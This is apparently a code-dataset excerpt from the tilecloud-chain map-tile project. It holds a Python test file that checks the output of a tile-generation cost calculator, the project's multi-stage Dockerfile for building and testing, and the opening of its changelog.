"src_encoding": "UTF-8", "text": "import os\n\nfrom tilecloud_chain import cost\nfrom tilecloud_chain.tests import CompareCase\n\n\nclass TestCost(CompareCase):\n def setUp(self) -> None: # noqa\n self.maxDiff = None\n\n 
@classmethod\n def setUpClass(cls): # noqa\n os.chdir(os.path.dirname(__file__))\n\n @classmethod\n def tearDownClass(cls): # noqa\n os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))\n\n ZOOM_SUMMARY = \"\"\"\n%(tiles)s tiles in zoom %(zoom)s.\nTime to generate: %(time)s [d h:mm:ss]\nS3 PUT: %(s3)s [$]\"\"\"\n\n LAYER_SUMMARY = \"\"\"\nNumber of tiles: %(tiles)s\nGeneration time: %(time)s [d h:mm:ss]\nGeneration cost: %(cost)s [$]\"\"\"\n\n GLOBAL_SUMMARY = \"\"\"\n===== GLOBAL =====\nTotal number of tiles: %(tiles)s\nTotal generation time: %(time)s [d h:mm:ss]\nTotal generation cost: %(cost)s [$]\"\"\"\n\n FINAL_SUMMARY = \"\"\"\nS3 Storage: %(storage)s [$/month]\nS3 get: %(get)s [$/month]\n\"\"\"\n # CloudFront: %(cloudfront)s [$/month]\n\n def test_cost_point(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml -l point\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"\",\n \"2 meta tiles in zoom 0.\",\n \"2 meta tiles in zoom 1.\",\n \"2 meta tiles in zoom 2.\",\n \"2 meta tiles in zoom 3.\",\n self.ZOOM_SUMMARY % {\"tiles\": \"6\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"6\", \"zoom\": \"1\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"6\", \"zoom\": \"2\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"6\", \"zoom\": \"3\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"24\", \"time\": \"0:00:00\", \"cost\": \"0.00\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_point_count(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml -l point --cost-algo count\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"\",\n \"1 meta tiles in zoom 0.\",\n \"1 meta tiles in zoom 1.\",\n \"6 meta tiles in zoom 2.\",\n \"2 meta tiles in zoom 3.\",\n self.ZOOM_SUMMARY % {\"tiles\": \"64\", \"zoom\": \"0\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"64\", \"zoom\": \"1\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"339\", \"zoom\": \"2\", \"time\": \"0:00:10\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"112\", \"zoom\": \"3\", \"time\": \"0:00:03\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"579\", \"time\": \"0:00:17\", \"cost\": \"0.01\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_line(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml -l line\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n \"2 meta tiles in zoom 0.\",\n \"2 meta tiles in zoom 1.\",\n \"4 meta tiles in zoom 2.\",\n \"8 meta tiles in zoom 3.\",\n \"14 
meta tiles in zoom 4.\",\n self.ZOOM_SUMMARY % {\"tiles\": \"11\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"19\", \"zoom\": \"1\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"43\", \"zoom\": \"2\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"84\", \"zoom\": \"3\", \"time\": \"0:00:02\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"164\", \"zoom\": \"4\", \"time\": \"0:00:05\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"321\", \"time\": \"0:00:10\", \"cost\": \"0.00\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_line_count(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -d -c tilegeneration/test-fix.yaml -l line --cost-algo count\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n \"1 meta tiles in zoom 0.\",\n \"1 meta tiles in zoom 1.\",\n \"6 meta tiles in zoom 2.\",\n \"10 meta tiles in zoom 3.\",\n \"21 meta tiles in zoom 4.\",\n self.ZOOM_SUMMARY % {\"tiles\": \"64\", \"zoom\": \"0\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"64\", \"zoom\": \"1\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"383\", \"zoom\": \"2\", \"time\": \"0:00:11\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"493\", \"zoom\": \"3\", \"time\": \"0:00:15\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"600\", \"zoom\": \"4\", \"time\": \"0:00:18\", \"s3\": \"0.01\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"1604\", \"time\": \"0:00:49\", \"cost\": \"0.02\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_polygon(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml -l polygon\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n self.ZOOM_SUMMARY % {\"tiles\": \"13\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"35\", \"zoom\": \"1\", \"time\": \"0:00:02\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"167\", \"zoom\": \"2\", \"time\": \"0:00:10\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"601\", \"zoom\": \"3\", \"time\": \"0:00:36\", \"s3\": \"0.01\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"2268\", \"zoom\": \"4\", \"time\": \"0:02:16\", \"s3\": \"0.02\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"3084\", \"time\": \"0:03:05\", \"cost\": \"0.03\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_polygon_count(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c 
tilegeneration/test-fix.yaml \"\n \"-l polygon --cost-algo count\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n self.ZOOM_SUMMARY % {\"tiles\": \"12\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"35\", \"zoom\": \"1\", \"time\": \"0:00:02\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"165\", \"zoom\": \"2\", \"time\": \"0:00:09\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"609\", \"zoom\": \"3\", \"time\": \"0:00:36\", \"s3\": \"0.01\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"2240\", \"zoom\": \"4\", \"time\": \"0:02:14\", \"s3\": \"0.02\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"3061\", \"time\": \"0:03:03\", \"cost\": \"0.03\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_default(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"\",\n \"===== line =====\",\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n \"2 meta tiles in zoom 0.\",\n \"2 meta tiles in zoom 1.\",\n \"4 meta tiles in zoom 2.\",\n \"8 meta tiles in zoom 3.\",\n \"14 meta tiles in zoom 4.\",\n self.ZOOM_SUMMARY % {\"tiles\": \"11\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"19\", \"zoom\": \"1\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"43\", \"zoom\": \"2\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"84\", \"zoom\": \"3\", \"time\": \"0:00:02\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"164\", \"zoom\": \"4\", \"time\": \"0:00:05\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"321\", \"time\": \"0:00:10\", \"cost\": \"0.00\"},\n \"\",\n \"===== polygon =====\",\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n self.ZOOM_SUMMARY % {\"tiles\": \"13\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"35\", \"zoom\": \"1\", \"time\": \"0:00:02\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"167\", \"zoom\": \"2\", \"time\": \"0:00:10\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"601\", \"zoom\": \"3\", \"time\": \"0:00:36\", \"s3\": \"0.01\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"2268\", \"zoom\": \"4\", \"time\": \"0:02:16\", \"s3\": \"0.02\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"3084\", \"time\": \"0:03:05\", \"cost\": \"0.03\"},\n self.GLOBAL_SUMMARY % {\"tiles\": \"3405\", \"time\": \"0:03:15\", \"cost\": \"0.03\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"55.78\",\n # 'cloudfront': '54.78',\n },\n ]\n ),\n )\n\n def test_cost_polygon2(self) -> None:\n self.assert_cmd_equals(\n 
cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml -l polygon2\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"\",\n \"925 meta tiles in zoom 0.\",\n \"21310 meta tiles in zoom 1.\",\n \"84341 meta tiles in zoom 2.\",\n self.ZOOM_SUMMARY % {\"tiles\": \"54534\", \"zoom\": \"0\", \"time\": \"0:27:43\", \"s3\": \"0.55\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"1340772\", \"zoom\": \"1\", \"time\": \"11:21:02\", \"s3\": \"13.41\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY\n % {\"tiles\": \"5351829\", \"zoom\": \"2\", \"time\": \"1 21:18:05\", \"s3\": \"53.52\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"6747135\", \"time\": \"2 9:06:51\", \"cost\": \"67.47\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.02\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_nometa(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml -l all\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n self.ZOOM_SUMMARY % {\"tiles\": \"2\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"4\", \"zoom\": \"1\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"10\", \"zoom\": \"2\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"27\", \"zoom\": \"3\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"84\", \"zoom\": \"4\", \"time\": \"0:00:05\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"127\", \"time\": \"0:00:07\", \"cost\": \"0.00\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_layer_bbox(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml -l all --cost-algo count\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n self.ZOOM_SUMMARY % {\"tiles\": \"2\", \"zoom\": \"0\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"2\", \"zoom\": \"1\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"9\", \"zoom\": \"2\", \"time\": \"0:00:00\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"25\", \"zoom\": \"3\", \"time\": \"0:00:01\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"81\", \"zoom\": \"4\", \"time\": \"0:00:04\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"119\", \"time\": \"0:00:07\", \"cost\": \"0.00\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_no_geom(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test-fix.yaml -l point --no-geom\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n 
\"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"\",\n \"11 meta tiles in zoom 0.\",\n \"28 meta tiles in zoom 1.\",\n \"123 meta tiles in zoom 2.\",\n \"427 meta tiles in zoom 3.\",\n self.ZOOM_SUMMARY % {\"tiles\": \"312\", \"zoom\": \"0\", \"time\": \"0:00:09\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"1090\", \"zoom\": \"1\", \"time\": \"0:00:33\", \"s3\": \"0.01\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"6237\", \"zoom\": \"2\", \"time\": \"0:03:10\", \"s3\": \"0.06\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"24190\", \"zoom\": \"3\", \"time\": \"0:12:18\", \"s3\": \"0.24\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"31829\", \"time\": \"0:16:12\", \"cost\": \"0.32\"},\n self.FINAL_SUMMARY\n % {\n \"storage\": \"0.00\",\n \"get\": \"32.89\",\n # 'cloudfront': '31.89',\n },\n ]\n ),\n )\n\n def test_cost_sqs_nometa(self) -> None:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_cost -c tilegeneration/test.yaml -l point_hash_no_meta\",\n main_func=cost.main,\n expected=\"\\n\".join(\n [\n \"Calculate zoom 0.\",\n \"Calculate zoom 1.\",\n \"Calculate zoom 2.\",\n \"Calculate zoom 3.\",\n \"Calculate zoom 4.\",\n \"\",\n self.ZOOM_SUMMARY % {\"tiles\": \"279\", \"zoom\": \"0\", \"time\": \"0:00:16\", \"s3\": \"0.00\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"1026\", \"zoom\": \"1\", \"time\": \"0:01:01\", \"s3\": \"0.01\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"6079\", \"zoom\": \"2\", \"time\": \"0:06:04\", \"s3\": \"0.06\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"23876\", \"zoom\": \"3\", \"time\": \"0:23:52\", \"s3\": \"0.24\"},\n \"SQS usage: 0.00 [$]\",\n self.ZOOM_SUMMARY % {\"tiles\": \"94626\", \"zoom\": \"4\", \"time\": \"1:34:37\", \"s3\": \"0.95\"},\n \"SQS usage: 0.00 [$]\",\n self.LAYER_SUMMARY % {\"tiles\": \"125886\", \"time\": \"2:05:53\", \"cost\": \"1.26\"},\n self.FINAL_SUMMARY % {\"storage\": \"0.00\", \"get\": \"32.89\"},\n ]\n ),\n )\n" }, { "alpha_fraction": 0.6896615624427795, "alphanum_fraction": 0.7063964009284973, "avg_line_length": 35.33783721923828, "blob_id": "8cceecdabe12f4f06390ead8145764e2ef851953", "content_id": "40f75374e2ae9446bcc4447eb7966bdc0fcde10e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 5378, "license_type": "permissive", "max_line_length": 123, "num_lines": 148, "path": "/Dockerfile", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "# Base of all section, install the apt packages\nFROM ghcr.io/osgeo/gdal:ubuntu-small-3.7.1 as base-all\nLABEL maintainer Camptocamp \"[email protected]\"\n\n# Fail on error on pipe, see: https://github.com/hadolint/hadolint/wiki/DL4006.\n# Treat unset variables as an error when substituting.\n# Print commands and their arguments as they are executed.\nSHELL [\"/bin/bash\", \"-o\", \"pipefail\", \"-cux\"]\n\nRUN --mount=type=cache,target=/var/lib/apt/lists \\\n --mount=type=cache,target=/var/cache,sharing=locked \\\n apt-get update \\\n && apt-get upgrade --assume-yes \\\n && apt-get install --assume-yes --no-install-recommends \\\n libmapnik3.1 mapnik-utils \\\n libdb5.3 \\\n fonts-dejavu \\\n optipng jpegoptim \\\n postgresql-client net-tools iputils-ping \\\n python3-pip\n\n# Used to convert the locked packages by poetry to pip requirements format\n# We don't directly use `poetry 
install` because it force to use a virtual environment.\nFROM base-all as poetry\n\n# Install Poetry\nWORKDIR /tmp\nCOPY requirements.txt ./\nRUN --mount=type=cache,target=/root/.cache \\\n python3 -m pip install --disable-pip-version-check --requirement=requirements.txt\n\n# Do the conversion\nCOPY poetry.lock pyproject.toml ./\nENV POETRY_DYNAMIC_VERSIONING_BYPASS=0.0.0\nRUN poetry export --output=requirements.txt \\\n && poetry export --with=dev --output=requirements-dev.txt\n\n# Base, the biggest thing is to install the Python packages\nFROM base-all as base\n\nRUN --mount=type=cache,target=/var/lib/apt/lists \\\n --mount=type=cache,target=/var/cache,sharing=locked \\\n --mount=type=cache,target=/root/.cache \\\n --mount=type=bind,from=poetry,source=/tmp,target=/poetry \\\n DEV_PACKAGES=\"python3-dev build-essential libgeos-dev libmapnik-dev libpq-dev build-essential\" \\\n && apt-get update \\\n && apt-get install --assume-yes --no-install-recommends ${DEV_PACKAGES} \\\n && python3 -m pip install --disable-pip-version-check --no-deps --requirement=/poetry/requirements.txt \\\n && python3 -m compileall /usr/local/lib/python* /usr/lib/python* \\\n && strip /usr/local/lib/python*/dist-packages/shapely/*.so \\\n && apt-get remove --purge --autoremove --yes ${DEV_PACKAGES} binutils\n\n# From c2cwsgiutils\n\nCMD [\"gunicorn\", \"--paste=/app/production.ini\"]\n\nENV LOG_TYPE=console \\\n DEVELOPMENT=0 \\\n PKG_CONFIG_ALLOW_SYSTEM_LIBS=OHYESPLEASE\n\nENV C2C_SECRET= \\\n C2C_BASE_PATH=/c2c \\\n C2C_REDIS_URL= \\\n C2C_REDIS_SENTINELS= \\\n C2C_REDIS_TIMEOUT=3 \\\n C2C_REDIS_SERVICENAME=mymaster \\\n C2C_REDIS_DB=0 \\\n C2C_BROADCAST_PREFIX=broadcast_api_ \\\n C2C_REQUEST_ID_HEADER= \\\n C2C_REQUESTS_DEFAULT_TIMEOUT= \\\n C2C_SQL_PROFILER_ENABLED=0 \\\n C2C_PROFILER_PATH= \\\n C2C_PROFILER_MODULES= \\\n C2C_DEBUG_VIEW_ENABLED=0 \\\n C2C_ENABLE_EXCEPTION_HANDLING=0\n\n# End from c2cwsgiutils\n\nENV TILEGENERATION_CONFIGFILE=/etc/tilegeneration/config.yaml \\\n TILEGENERATION_MAIN_CONFIGFILE=/etc/tilegeneration/config.yaml \\\n TILEGENERATION_HOSTSFILE=/etc/tilegeneration/hosts.yaml \\\n TILECLOUD_CHAIN_LOG_LEVEL=INFO \\\n TILECLOUD_LOG_LEVEL=INFO \\\n C2CWSGIUTILS_LOG_LEVEL=WARN \\\n GUNICORN_LOG_LEVEL=WARN \\\n SQL_LOG_LEVEL=WARN \\\n OTHER_LOG_LEVEL=WARN \\\n VISIBLE_ENTRY_POINT=/ \\\n TILE_NB_THREAD=2 \\\n METATILE_NB_THREAD=25 \\\n SERVER_NB_THREAD=10 \\\n TILE_QUEUE_SIZE=2 \\\n TILE_CHUNK_SIZE=1 \\\n TILE_SERVER_LOGLEVEL=quiet \\\n TILE_MAPCACHE_LOGLEVEL=verbose\n\nEXPOSE 8080\n\nWORKDIR /app/\n\n# The final part\nFROM base as runner\n\nCOPY . /app/\nARG VERSION=dev\nENV POETRY_DYNAMIC_VERSIONING_BYPASS=dev\nRUN --mount=type=cache,target=/root/.cache \\\n POETRY_DYNAMIC_VERSIONING_BYPASS=${VERSION} python3 -m pip install --disable-pip-version-check --no-deps --editable=. 
\\\n    && mv docker/run /usr/bin/ \\\n    && python3 -m compileall -q /app/tilecloud_chain\n\nRUN mkdir -p /prometheus-metrics \\\n    && chmod a+rwx /prometheus-metrics\nENV PROMETHEUS_MULTIPROC_DIR=/prometheus-metrics\n\n# Image used to run the lint and the tests\nFROM base as tests\n\nRUN --mount=type=cache,target=/var/lib/apt/lists \\\n    --mount=type=cache,target=/var/cache,sharing=locked \\\n    apt-get install --assume-yes --no-install-recommends git curl gnupg \\\n    libglib2.0-0 libnss3 libatk1.0-0 libatk-bridge2.0-0 libcups2 libdrm2 libxkbcommon0 libxcomposite1 \\\n    libxdamage1 libxfixes3 libxrandr2 libgbm1 libpango-1.0-0 libcairo2 libasound2\n\nRUN --mount=type=cache,target=/var/lib/apt/lists \\\n    --mount=type=cache,target=/var/cache,sharing=locked \\\n    . /etc/os-release \\\n    && echo \"deb https://deb.nodesource.com/node_18.x ${VERSION_CODENAME} main\" > /etc/apt/sources.list.d/nodesource.list \\\n    && curl --silent https://deb.nodesource.com/gpgkey/nodesource.gpg.key | apt-key add - \\\n    && apt-get update \\\n    && apt-get install --assume-yes --no-install-recommends 'nodejs=18.*'\n\nCOPY package.json package-lock.json ./\nRUN npm install --dev\n\nRUN --mount=type=cache,target=/root/.cache \\\n    --mount=type=bind,from=poetry,source=/tmp,target=/poetry \\\n    python3 -m pip install --disable-pip-version-check --no-deps --requirement=/poetry/requirements-dev.txt\n\nCOPY . ./\nRUN --mount=type=cache,target=/root/.cache \\\n    POETRY_DYNAMIC_VERSIONING_BYPASS=0.0.0 python3 -m pip install --disable-pip-version-check --no-deps --editable=. \\\n    && python3 -m pip freeze > /requirements.txt\n\nENV TILEGENERATION_MAIN_CONFIGFILE=\n\n# Set runner as final\nFROM runner\n" }, { "alpha_fraction": 0.6915462613105774, "alphanum_fraction": 0.7065275311470032, "avg_line_length": 36.75757598876953, "blob_id": "3f9f6661fc1cb4e9ac7d719aa2348c2fce7d6f83", "content_id": "34f1ab9514e73110ae50f89e41d2b082e15441e9", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3738, "license_type": "permissive", "max_line_length": 112, "num_lines": 99, "path": "/CHANGES.md", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "# Changelog\n\n## Release 1.17\n\n1. Change the validator and parser: a duplicate key now generates an error, and on/off are no longer\n   considered as booleans.\n2. The argument `--layer` is no longer used when the parameter `--tiles` is given; the information is taken\n   from the tiles file.\n3. Be able to mutualise the service.\n4. Add Azure blob storage.\n5. Remove Apache and MapCache.\n6. Remove the `log_format` in the `generation` configuration; now we use the logging configuration from the\n   `development.ini` file.\n\n## Release 1.16\n\n1. Change the config validator, which is a little bit stricter.\n\n## Release 1.4\n\n1. Add an optional `metadata` section to the config file. See the scaffolds for an example.\n\n## Release 0.9\n\n1. Correct some errors with slashes.\n2. Better error handling.\n3. Be able to have one error file per layer.\n\n## Release 0.8\n\n1. Correct some errors with slashes.\n2. Add `pre_hash_post_process` and `post_process`.\n3. Add the copy command.\n\n## Release 0.7\n\n
